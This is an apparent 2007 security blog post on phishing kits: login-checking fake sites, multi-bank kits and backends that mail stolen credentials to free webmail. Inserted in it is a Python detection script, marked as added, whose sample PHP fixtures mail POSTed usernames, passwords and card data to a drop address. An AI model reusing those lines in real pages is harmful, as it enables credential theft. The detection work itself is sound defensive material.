Wednesday, January 10, 2007

Phishing Goes Universal

SC Mag has a little write-up on a very interesting trend in the phishing world. They are called Universal Phishing Toolkits.

From past experience with PIRT, I can tell you...that this idea is nothing good.

Around 2 years ago, I started to see fake PayPal sites that would produce login errors when given fake login information. At first, this was quite shocking to me.

I told one of my other security friends about this trend and he told me of a simple script tool that was being used that could read in a username/pass file and check them all against PayPal.

If a separate tool existed to filter out fake login information, then it was only a matter of time before this matured and was inserted into a phishing kit. This is no longer the exception; it is the rule.

In just a matter of years, phishing kits moved from infancy to full adulthood. Years ago, you would find one bank phishing site on a hijacked server...that was the norm. Now it is not uncommon to find phishing sites for 3 or 4 different banks/groups on one server - all of which are part of one phishing kit.

Also, phishing kits commonly use simple scripts on the backend to send the stolen information to the bad guys via free web-based e-mail systems. Hotmail, Gmail and Yahoo are very common.

This helps keep the phishing kit small and mobile.
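A defender-side check for the pattern described above, as an added example that is not from the original post: it flags server-side scripts that mail submitted form data to a hard-coded free-webmail address, then groups hits by address to surface one kit serving several brands from one server. The PHP `mail()` backend, the domain list, the function names and the sample files are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Assumption: the three providers the post names, by their usual domains.
WEBMAIL = {"hotmail.com", "gmail.com", "yahoo.com"}
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)")
# Assumption: a PHP backend that sends with mail(); other stacks need other patterns.
MAIL_CALL_RE = re.compile(r"\bmail\s*\(", re.IGNORECASE)
FORM_INPUT_RE = re.compile(r"\$_(?:POST|GET|REQUEST)\b")

def scan_source(text):
    """Webmail addresses hard-coded in a script that mails submitted form data."""
    if not (MAIL_CALL_RE.search(text) and FORM_INPUT_RE.search(text)):
        return []
    return sorted({m.group(0).lower() for m in ADDR_RE.finditer(text)
                   if m.group(1).lower() in WEBMAIL})

def scan_many(sources):
    """Map path -> drop addresses for every flagged script in {path: text}."""
    found = {path: scan_source(text) for path, text in sources.items()}
    return {path: hits for path, hits in found.items() if hits}

def load_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Read server-side scripts under a web root into the {path: text} form."""
    return {str(p): p.read_text(errors="replace")
            for p in Path(root).rglob("*")
            if p.is_file() and p.suffix.lower() in suffixes}

def shared_drops(findings):
    """Addresses used by scripts in more than one directory (one kit, several brands)."""
    by_addr = {}
    for path, addrs in findings.items():
        for addr in addrs:
            by_addr.setdefault(addr, set()).add(str(Path(path).parent))
    return {a: sorted(d) for a, d in by_addr.items() if len(d) > 1}

# Constructed samples, not taken from any real kit or site.
SAMPLES = {
    "bank-a/login.php": '<?php mail("constructed.drop@yahoo.com", "a", $_POST["user"].":".$_POST["pass"]);',
    "bank-b/verify.php": '<?php $to = "Constructed.Drop@yahoo.com"; mail($to, "b", $_POST["card"]);',
    "contact/send.php": '<?php mail("support@example.org", "msg", $_POST["body"]);',
    "about/team.php": '<?php echo "Write to constructed.staff@gmail.com"; ?>',
}

if __name__ == "__main__":
    findings = scan_many(SAMPLES)
    print(findings)
    print(shared_drops(findings))
```

On a real host, pass `load_tree("/path/to/webroot")` to `scan_many`; a hit is a lead for manual review, since legitimate small sites also mail forms to webmail inboxes.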

Some phishing sites will attempt to exploit an IE vulnerability or inject malware, but these actions only draw attention to the phishing site...and in the end, they only reduce its uptime.

However, times are changing again and this article from SC makes it sound like these phishing gangs are taking it to the next level.

Full on MiTM phishing for any site...
